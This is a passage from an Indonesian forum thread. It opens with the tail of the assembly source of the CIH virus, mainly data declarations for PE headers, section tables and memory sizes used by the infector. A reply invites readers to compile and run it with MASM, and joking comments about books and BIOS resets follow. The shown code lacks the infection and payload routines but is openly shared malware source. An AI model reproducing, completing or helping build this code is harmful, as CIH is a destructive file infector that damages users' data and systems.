VirusVersionCopyright   db      'CIH v'
                        db      MajorVirusVersion+'0'
                        db      '.'
                        db      MinorVirusVersion+'0'
                        db      ' TTIT'
;                      Virus Size                         
VirusSize                       =       $
;                               + SizeOfVirusCodeSectionTableEndMark(04h)
;                               + NumberOfSections(??) SizeOfVirusCodeSectionTable(08h)
;                               + SizeOfTheFirstVirusCodeSectionTable(04h)
;                       Dynamic Data                      
VirusGameDataStartAddress       =       VirusSize
@6                              =       VirusGameDataStartAddress
OnBusy                          db      0
FileModificationTime            dd      ?
FileNameBuffer          db      FileNameBufferSize dup(?)
@7                      =       FileNameBuffer
DataBuffer              =       $
@8                      =       DataBuffer
NumberOfSections        dw      ?
TimeDateStamp           dd      ?
SymbolsPointer          dd      ?
NumberOfSymbols         dd      ?
SizeOfOptionalHeader    dw      ?
_Characteristics        dw      ?
Magic                   dw      ?
LinkerVersion           dw      ?
SizeOfCode              dd      ?
SizeOfInitializedData   dd      ?
SizeOfUninitializedData dd      ?
AddressOfEntryPoint     dd      ?
BaseOfCode              dd      ?
BaseOfData              dd      ?
ImageBase               dd      ?
@9                      =       $
SectionAlignment        dd      ?
FileAlignment           dd      ?
OperatingSystemVersion  dd      ?
ImageVersion            dd      ?
SubsystemVersion        dd      ?
Reserved                dd      ?
SizeOfImage             dd      ?
SizeOfHeaders           dd      ?
SizeOfImageHeaderToRead         =       $-NumberOfSections
NewAddressOfEntryPoint  =       DataBuffer      ; DWORD
SizeOfImageHeaderToWrite        =       04h
StartOfSectionTable     =       @9
SectionName             =       StartOfSectionTable     ; QWORD
VirtualSize             =       StartOfSectionTable+08h ; DWORD
VirtualAddress          =       StartOfSectionTable+0ch ; DWORD
SizeOfRawData           =       StartOfSectionTable+10h ; DWORD
PointerToRawData        =       StartOfSectionTable+14h ; DWORD
PointerToRelocations    =       StartOfSectionTable+18h ; DWORD
PointerToLineNumbers    =       StartOfSectionTable+1ch ; DWORD
NumberOfRelocations     =       StartOfSectionTable+20h ; WORD
NumberOfLinenNmbers     =       StartOfSectionTable+22h ; WORD
Characteristics         =       StartOfSectionTable+24h ; DWORD
SizeOfScetionTable      =       Characteristics+04h-SectionName
;               Virus Total Need Memory                   
VirusNeedBaseMemory     =       $
VirusTotalNeedMemory    =       @9
;                               + NumberOfSections(??)SizeOfScetionTable(28h)
;                               + SizeOfVirusCodeSectionTableEndMark(04h)
;                               + NumberOfSections(??) SizeOfVirusCodeSectionTable(08h)
;                               + SizeOfTheFirstVirusCodeSectionTable(04h)
;              **
VirusGame               ENDS
                        END     FileHeader
:D :D maaf ya mas luri kalo kebanyakan, kalo gak penting "trash" aja neh posting
user image
more 16 years ago


@n3o_cybertech: ada ada aja.. :D
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more 16 years ago


ayem kambek, xixiixix
@mambamaestro: xi xi xi, :D jangan-jangan mas Luri dulu yang ngarang buku 'membedah PC dengan Turbo Pascal?' hayo ngaku
wakakakkaka klo judul itu karangan S'to jadul bangeeet klo ga salah taun 90-an tapi bos ulil judul karangannya bukunya ga jadul banget kale... @n3o_cybertech ko aku malah jadi pusing nyari script yg keterkaitan dengan clear bios-nya, ga di potong az bro to the point? tapi klo @deLogic dan tau nich posisinya yg mana, xixixii!
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more 16 years ago


@ImanD: juga dapet barusan pas lagi iseng2 searching, pinginnya sih belajar assembler malah dapet kode virus...tapi katanya sih itu telah dirancang untuk prosessor berarsitektur 32 lom sempet bedah2 tuh tapi keliatan banget koq...ayo sapa yang mo nyoba kompile dan jalanin??? pake MASM bisa koq. @M.Luri & MOD : kalo mo "trash" jangan sungkan2 ya... :D :D :D
user image
more 16 years ago


maaf jadi oot. musti diluruskanih.. buku 'membedah PC dengan Turbo Pascal?' bukanlah karangan/tulisan/terbitan saya. dan satupun saya belumnya pernah menulis buku untuk diterbitkan secara nasional. yang pernah ditulis, paling: - buku manual pemakaian aplikasi a - silabus pengajaran kuliah b - draft proposal c - invoice d - kuitansi e babar blas belum pernah nerbitin buku. nulis paling dimedia online, paling di , itupun juga jaman dulu. sekarang sdh kewalahan xixixix.... ok, balik ke reset bios, kalo manual, di short aja jumper yang tersedia di mainboard-nya. nahh.. berarti tinggal buat kode delphinya:

  showmessage( 'halo semua, saya mau reset bios. TOLONG DONG diresetkan ! CePAT !');

  BroadcastToNetwork( 'halo semua, saya mau reset bios. TOLONG DONG diresetkan ! CePAT !');
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more 16 years ago


@bos_ulil waakakakkakakakkak, itu memang yg sangat mujarab
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